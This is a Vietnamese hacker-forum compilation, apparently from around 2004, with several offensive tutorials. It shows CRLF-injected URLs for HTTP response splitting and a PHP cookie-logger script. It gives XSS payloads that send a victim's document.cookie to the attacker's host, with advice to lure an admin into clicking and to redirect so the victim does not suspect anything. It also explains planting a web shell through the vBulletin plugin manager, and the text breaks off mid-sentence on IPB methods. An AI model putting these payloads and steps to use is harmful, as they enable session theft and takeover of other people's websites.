Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo.. Định viết luôn nhưng vì sợ các bạn bảo ăn cắp bản quyền nên post nguyên văn một bài viết của tác giả huythanh Trích
Trang 1</head>
<body>
HTTP /1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Shazam</html>
</body>
</html>
Nhìn kĩ code
QUOTE
%20 = spacebar
%0d%0a = xuống 2 dòng (skip 2 line)
Để tiện lợi hơn cho tấn công, xin giới thiệu một công cụ encode các kí tự trên URL http://horohoro.k7q1.com/HCE-URLencode.htm
WinDak
post Aug 25 2004, 04:38 PM
IP: Private | Post #6|
HCE-Group
Group Icon
Group: ** Tổng Tư Lệnh **
Posts: 14
Joined: 18-August 04
Trang 2Member No.: 7
Warn: (0%) -+
Xin giải thích thêm:
Kĩ thuật web response này sử dụng để thay đổi tạm thời trang web khi được gửi đến client, nó gần giống XSS , nhưng XSS ta chỉ có thể chèn script vào để ăn cắp cookie, còn với kĩ thuật này ta có thể thay đổi hoàn toàn nội dung trang web này CODE
%0d%0aContent-
Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent-Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html>
Phần nằm trong <html></html> chính là website ta đã thay đổi, và khi victim click vào link
CODE
http://x.x.x.x/by_lang.jsp=English%0d%0aContent-
Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent-Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html>
nội dung victim nhìn thấy chỉ là đoạn trong <html></html>
Không biết tôi nói thế có chính xác không hả horo ^^
v
XSS căn bản
Lâu không post bài nào , toàn chat chit spam vớ vẩn Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo Định viết luôn nhưng vì sợ các bạn bảo ăn cắp bản quyền nên post nguyên văn một bài viết của tác giả huythanh
Trích:
Ngày nay, trên Internet ko khó để thấy các bug mới về XSS huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này Vì mới tìm hiểu
Trang 3nên bài này hợp với newbie hơn Ai copy nhớ cái copyright hộ nhá
** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may
là in ra 1 bản rồi Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra Anyway, cho gởi lời cảm ơn đặc biệt đến Mask
Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm
CSS : Cascading Style Sheets
XSS : Cross-Site Scripting
*** Dấu hiệu nhận biết site mắc lỗi :
Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này
Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây]
Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác
là siêu sao
*** Cách chèn script :
Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được ) Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá
Code:
javascript:alert(document.cookie)
Thấy gì nào ? Nó sẽ ra có dạng thế này
acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;};
session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1;
pass_hash=c561a5a3859a0df75f76d98ae67bc026
[ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ]
Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó
vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie
Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong
Trang 4Code:
javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie)
Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó
document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất
Nếu hiểu được tới đây thì chắc chẳng còn gì để nói Sau đây là cách exploit
*** Cách exploit :
Đầu tiên tạo file cookie.php thế này up lên host của bạn
PHP Code:
<?
/*XSS Exploit */
/*PHP Cookie Saver */
/*Copyright by huythanhv2, HCVTEAM.NET */
$f=fopen(" xss.txt","a");
$cook=$HTTP_GET_VARS["cookie"];
fputs($f,$cook.chr(13));
fclose($f);
header("location: http://DIACHIDEDUDO.DUDO");
?>
XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này
Code:
http://sitexss.com/index.php?act=[xss]
Chúng ta khai thác thế này:
Code:
http://sitexss.com/index.php?act=<script>location="http://hostcuaban.com/cookie php?cookie="+(document.cookie)
</script>
Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn
Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái
DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi )
Trang 5*** Vài lưu ý :
Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ :
1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS
10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà )
2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn 3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái
đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade
nó lên location
Hi vọng các bạn có thể hiểu được vì bài viết khá chi tiết , chưa hiểu chỗ nào post lên đây Mod forum sẽ hướng dẫn cụ thể Đọc xong bài này chắc các bạn cũng hiểu được cách mà người ta sử dụng với html injection trong vbb vừa qua ( Tìm đọc thêm bài của navaro trong box này )
Posted by kecodoc(HCE)
Cách up shelll ở IPB, VBB !!!
Thấy bài này của longnhi post bên VN1 cũng hay, rất có ích cho newbie tham khảo, để tránh trường hợp các bạn cứ open topic hỏi các vấn đề này, nên tôi copy
nó về HcE
Anh em nào có cách up shell khác có thể post trong topic này luôn tks
==================================================
=========
upshell thì tùy theo khả năng của mỗi người thôi, cái này nói chung chung hơi khó nhưng mà đối với VBB hay IPB thì tớ có thể giúp (cái này tớ nói khi đã vào được admincp)
+VBB: thằng này upshell rất đơn giản vào phần add plugin của VBB add thêm plugin mới và trong plugin này chứa đoạn code include shell
Ex:include('link shell');
Chú ý là phải enable cái plugin trước và phải để cái plugin mới add ở chế độ
active
Trang 6+IPB:Thằng này hiện tại tớ có 3 cách up shell
Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần